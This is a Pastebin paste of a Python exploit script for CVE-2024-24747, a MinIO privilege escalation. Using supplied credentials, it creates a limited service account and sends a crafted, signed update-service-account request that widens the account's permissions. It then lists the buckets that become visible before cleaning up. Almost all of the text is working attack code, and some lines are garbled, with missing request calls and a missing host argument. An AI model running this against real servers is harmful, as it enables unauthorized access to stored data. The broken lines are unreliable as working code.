Not a member of Pastebin yet?
Sign Up,
it unlocks many cool features!
- # Exploit Title: MinIO < 2024-01-31T20-20-33Z - Privilege Escalation
- # Date: 2024-04-11
- # Exploit Author: Jenson Zhao
- # Vendor Homepage:
- # Software Link:
- # Version: Up to (excluding) RELEASE.2024-01-31T20-20-33Z
- # Tested on: Windows 10
- # CVE : CVE-2024-24747
- # Required before execution: pip install minio,requests
- import argparse
- import datetime
- import traceback
- import urllib
- from xml.dom.minidom import parseString
- import requests
- import json
- import base64
- from minio.credentials import Credentials
- from minio.signer import sign_v4_s3
- class CVE_2024_24747:
- new_buckets = []
- old_buckets = []
- def __init__(self, host, port, console_port, accesskey, secretkey, verify=False):
- self.bucket_names = ['pocpublic', 'pocprivate']
- self.new_accesskey = 'miniocvepoc'
- self.new_secretkey = 'MINIOcvePOC'
- self.headers = {
- 'User-Agent': 'Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/ Safari/537.36',
- 'Content-Type': 'application/json',
- 'Accept': '*/*'
- }
- self.accesskey = accesskey
- self.secretkey = secretkey
- self.verify = verify
- if verify:
- self.url = "https://" + host + ":" + port
- self.console_url = "https://" + host + ":" + console_port
- else:
- self.url = "http://" + host + ":" + port
- self.console_url = "http://" + host + ":" + console_port
- self.credits = Credentials(
- access_key=self.new_accesskey,
- secret_key=self.new_secretkey
- )
- self.login()
- try:
- self.create_buckets()
- self.create_accesskey()
- self.old_buckets = self.console_ls()
- self.console_exp()
- self.new_buckets = self.console_ls()
- except:
- traceback.print_stack()
- finally:
- self.delete_accesskey()
- self.delete_buckets()
- if len(self.new_buckets) > len(self.old_buckets):
- print("There is CVE-2024-24747 problem with the minio!")
- print("Before the exploit, the buckets are : " + str(self.old_buckets))
- print("After the exploit, the buckets are : " + str(self.new_buckets))
- else:
- print("There is no CVE-2024-24747 problem with the minio!")
- def login(self):
- url = self.url + "/api/v1/login"
- payload = json.dumps({
- "accessKey": self.accesskey,
- "secretKey": self.secretkey
- })
- self.session = requests.session()
- if self.verify:
- self.session.verify = False
- status_code = self.session.request("POST", url, headers=self.headers, data=payload).status_code
- # print(status_code)
- if status_code == 204:
- status_code = 0
- else:
- print('Login failed! Please check if the input accesskey and secretkey are correct!')
- exit(1)
- def create_buckets(self):
- url = self.url + "/api/v1/buckets"
- for name in self.bucket_names:
- payload = json.dumps({
- "name": name,
- "versioning": False,
- "locking": False
- })
- status_code = self.session.request("POST", url, headers=self.headers, data=payload).status_code
- # print(status_code)
- if status_code == 200:
- status_code = 0
- else:
- print("新建 (New)"+name+" bucket 失败 (fail)!")
- def delete_buckets(self):
- for name in self.bucket_names:
- url = self.url + "/api/v1/buckets/" + name
- status_code = self.session.request("DELETE", url, headers=self.headers).status_code
- # print(status_code)
- if status_code == 204:
- status_code = 0
- else:
- print("删除 (delete)"+name+" bucket 失败 (fail)!")
- def create_accesskey(self):
- url = self.url + "/api/v1/service-account-credentials"
- payload = json.dumps({
- "policy": "{ \n \"Version\":\"2012-10-17\", \n \"Statement\":[ \n { \n \"Effect\":\"Allow\", \n \"Action\":[ \n \"s3:*\" \n ], \n \"Resource\":[ \n \"arn:aws:s3:::pocpublic\", \n \"arn:aws:s3:::pocpublic/*\" \n ] \n } \n ] \n}",
- "accessKey": self.new_accesskey,
- "secretKey": self.new_secretkey
- })
- status_code = self.session.request("POST", url, headers=self.headers, data=payload).status_code
- # print(status_code)
- if status_code == 201:
- # print("新建 (New)" + self.new_accesskey + " accessKey 成功 (success)!")
- # print(self.new_secretkey)
- status_code = 0
- else:
- print("新建 (New)" + self.new_accesskey + " accessKey 失败 (fail)!")
- def delete_accesskey(self):
- url = self.url + "/api/v1/service-accounts/" + base64.b64encode(self.new_accesskey.encode("utf-8")).decode('utf-8')
- status_code = self.session.request("DELETE", url, headers=self.headers).status_code
- # print(status_code)
- if status_code == 204:
- # print("删除" + self.new_accesskey + " accessKey成功!")
- status_code = 0
- else:
- print("删除 (delete)" + self.new_accesskey + " accessKey 失败 (fail)!")
- def headers_gen(self,url,sha256,method):
- datetimes = datetime.datetime.utcnow()
- datetime_str = datetimes.strftime('%Y%m%dT%H%M%SZ')
- urls = urllib.parse.urlparse(url)
- headers = {
- 'X-Amz-Content-Sha256': sha256,
- 'X-Amz-Date': datetime_str,
- 'Host': urls.netloc,
- }
- headers = sign_v4_s3(
- method=method,
- url=urls,
- region='us-east-1',
- headers=headers,
- credentials=self.credits,
- content_sha256=sha256,
- date=datetimes,
- )
- return headers
- def console_ls(self):
- url = self.console_url + "/"
- sha256 = "e3b0c44298fc1c149afbf4c8996fb92427ae41e4649b934ca495991b7852b855"
- headers = self.headers_gen(url,sha256,'GET')
- if self.verify:
- response = requests.get(url,headers=headers,verify=False)
- else:
- response = requests.get(url, headers=headers)
- DOMTree = parseString(response.text)
- collection = DOMTree.documentElement
- buckets = collection.getElementsByTagName("Bucket")
- bucket_names = []
- for bucket in buckets:
- bucket_names.append(bucket.getElementsByTagName("Name")[0].childNodes[0].data)
- # print('当前可查看的bucket有:\n' + str(bucket_names))
- return bucket_names
- def console_exp(self):
- url = self.console_url + "/minio/admin/v3/update-service-account?accessKey=" + self.new_accesskey
- sha256 = "0f87fd59dff29507f82e189d4f493206ea7f370d0ce97b9cc8c1b7a4e609ec95"
- headers = self.headers_gen(url, sha256, 'POST')
- hex_string = "e1fd1c29bed167d5cf4986d3f224db2994b4942291dbd443399f249b84c79d9f00b9e0c0c7eed623a8621dee64713a3c8c63e9966ab62fcd982336"
- content = bytes.fromhex(hex_string)
- if self.verify:
- response =,headers=headers,data=content,verify=False)
- else:
- response =,headers=headers,data=content)
- status_code = response.status_code
- if status_code == 204:
- # print("提升" + self.new_accesskey + " 权限成功!")
- status_code = 0
- else:
- print("提升 (promote)" + self.new_accesskey + " 权限失败 (Permission failed)!")
- if __name__ == '__main__':
- logo = """
- ____ ___ ____ _ _ ____ _ _ _____ _ _ _____
- ___ __ __ ___ |___ \ / _ \ |___ \ | || | |___ \ | || | |___ || || | |___ |
- / __|\ \ / / / _ \ _____ __) || | | | __) || || |_ _____ __) || || |_ / / | || |_ / /
- | (__ \ V / | __/|_____| / __/ | |_| | / __/ |__ _||_____| / __/ |__ _| / / |__ _| / /
- \___| \_/ \___| |_____| \___/ |_____| |_| |_____| |_| /_/ |_| /_/
- """
- print(logo)
- parser = argparse.ArgumentParser()
- parser.add_argument("-H", "--host", required=True, help="Host of the target. example:")
- parser.add_argument("-a", "--accesskey", required=True, help="Minio AccessKey of the target. example: minioadmin")
- parser.add_argument("-s", "--secretkey", required=True, help="Minio SecretKey of the target. example: minioadmin")
- parser.add_argument("-c", "--console_port", required=True, help="Minio console port of the target. example: 9000")
- parser.add_argument("-p", "--port", required=True, help="Minio port of the target. example: 9090")
- parser.add_argument("--https", action='store_true', help="Is MinIO accessed through HTTPS.")
- args = parser.parse_args()
- CVE_2024_24747(,args.port,args.console_port,args.accesskey,args.secretkey,args.https)
Add Comment
Please, Sign In to add comment